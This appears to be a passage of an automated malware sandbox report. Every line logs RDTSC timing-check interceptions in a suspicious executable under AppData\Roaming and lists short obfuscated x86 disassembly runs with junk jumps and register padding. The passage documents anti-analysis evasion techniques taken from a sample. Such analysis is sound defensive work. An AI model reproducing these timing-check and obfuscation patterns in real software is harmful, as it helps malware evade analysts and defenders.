Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0707 second address: 4EA077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E94F51A51h 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007F0E94F51A4Eh 0x00000012 je 00007F0F06FD4C7Eh 0x00000018 pushad 0x00000019 jmp 00007F0E94F51A4Eh 0x0000001e pushad 0x0000001f mov dx, cx 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 popad 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a pushad 0x0000002b mov cx, di 0x0000002e jmp 00007F0E94F51A57h 0x00000033 popad 0x00000034 mov si, 95EFh 0x00000038 popad 0x00000039 xor eax, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ebx 0x00000041 mov ah, D8h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA077B second address: 4EA0842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d mov dl, ah 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 jmp 00007F0E948C9FC3h 0x0000001a popfd 0x0000001b popad 0x0000001c ror eax, cl 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E948C9FC4h 0x00000025 add esi, 5147D008h 0x0000002b jmp 00007F0E948C9FBBh 0x00000030 popfd 0x00000031 jmp 00007F0E948C9FC8h 0x00000036 popad 0x00000037 leave 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F0E948C9FBEh 0x0000003f add esi, 5754C598h 0x00000045 jmp 00007F0E948C9FBBh 0x0000004a popfd 0x0000004b mov dx, si 0x0000004e popad 0x0000004f retn 0004h 0x00000052 nop 0x00000053 mov esi, eax 0x00000055 lea eax, dword ptr [ebp-08h] 0x00000058 xor esi, dword ptr [00AB2014h] 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 lea eax, dword ptr [ebp-10h] 0x00000064 push eax 0x00000065 call 00007F0E98CFA7F3h 0x0000006a push FFFFFFFEh 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F0E948C9FC1h 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0842 second address: 4EA0867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0867 second address: 4EA0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F0E98CFA831h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E948C9FC0h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0886 second address: 4EA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0898 second address: 4EA089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA089C second address: 4EA08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E94F51A53h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5002E second address: 4E500AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 and ch, 0000000Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC0h 0x00000018 sub ax, 1388h 0x0000001d jmp 00007F0E948C9FBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F0E948C9FBAh 0x00000036 jmp 00007F0E948C9FC5h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E500AE second address: 4E5013B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 6E5055D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F0E94F51A58h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dx, ax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 and ax, 2DD8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 jmp 00007F0E94F51A58h 0x00000035 popad 0x00000036 popad 0x00000037 and esp, FFFFFFF8h 0x0000003a jmp 00007F0E94F51A50h 0x0000003f xchg eax, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov edi, 0C56B380h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5013B second address: 4E50141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50141 second address: 4E50145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50145 second address: 4E50162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50162 second address: 4E50168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50168 second address: 4E5016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5016C second address: 4E5017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5017B second address: 4E50181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50181 second address: 4E501DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F0E94F51A50h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0E94F51A57h 0x00000019 add ecx, 2B0072CEh 0x0000001f jmp 00007F0E94F51A59h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501DE second address: 4E501FD instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E948C9FC0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501FD second address: 4E50203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50203 second address: 4E5023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 or ax, 1F16h 0x00000019 jmp 00007F0E948C9FC1h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5037C second address: 4E50383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50383 second address: 4E503FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 408Bh 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC5h 0x00000018 sbb si, 6786h 0x0000001d jmp 00007F0E948C9FC1h 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007F0F06998208h 0x0000002a jmp 00007F0E948C9FBEh 0x0000002f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000036 jmp 00007F0E948C9FC0h 0x0000003b je 00007F0F069981F3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FA second address: 4E503FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FE second address: 4E50404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50404 second address: 4E5044E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F0E94F51A50h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F0E94F51A50h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5044E second address: 4E50452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50452 second address: 4E50458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408B1 second address: 4E408EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC4h 0x00000014 jmp 00007F0E948C9FC5h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408EA second address: 4E40939 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E94F51A50h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bx, 8E66h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Ch 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f add ch, FFFFFFC6h 0x00000022 jmp 00007F0E94F51A51h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40939 second address: 4E4094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4094D second address: 4E40960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40AE2 second address: 4E40B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 je 00007F0F0699F84Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0E948C9FC7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B2E second address: 4E40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0E94F51A4Ch 0x00000017 sbb ch, FFFFFFD8h 0x0000001a jmp 00007F0E94F51A4Bh 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 jne 00007F0F0702728Ah 0x00000029 pushad 0x0000002a push esi 0x0000002b mov bl, 80h 0x0000002d pop esi 0x0000002e popad 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F0E94F51A4Bh 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edx, ax 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B96 second address: 4E40B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B9C second address: 4E40BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAB second address: 4E40BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAF second address: 4E40BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BC2 second address: 4E40BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, CFBEh 0x00000011 jmp 00007F0E948C9FBFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40CF9 second address: 4E40D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D09 second address: 4E40D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D0D second address: 4E40D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F0E94F51A57h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D34 second address: 4E40D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D38 second address: 4E40D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D53 second address: 4E40D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D59 second address: 4E40D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D5D second address: 4E40D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D61 second address: 4E40DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A58h 0x00000013 xor si, 3548h 0x00000018 jmp 00007F0E94F51A4Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0E94F51A58h 0x00000024 sbb esi, 649DF7A8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DC4 second address: 4E40DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCA second address: 4E40DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCE second address: 4E40DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx edi, cx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD1 second address: 4E50DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD7 second address: 4E50DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DF7 second address: 4E50DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DFB second address: 4E50E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E01 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E94F51A58h 0x00000008 pop ecx 0x00000009 jmp 00007F0E94F51A4Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0E94F51A59h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0E94F51A4Eh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 mov bl, D6h 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E5E second address: 4E50E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E6C second address: 4E50E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 44D57068h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E76 second address: 4E50E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B4E second address: 4E50B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B60 second address: 4E50B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B64 second address: 4E50B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 push edi 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 mov al, D3h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0E94F51A53h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B9D second address: 4E50BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0289 second address: 4EC02A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A2 second address: 4EC02A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A8 second address: 4EC02AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02AC second address: 4EC02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02B0 second address: 4EC02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02BF second address: 4EC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02C3 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
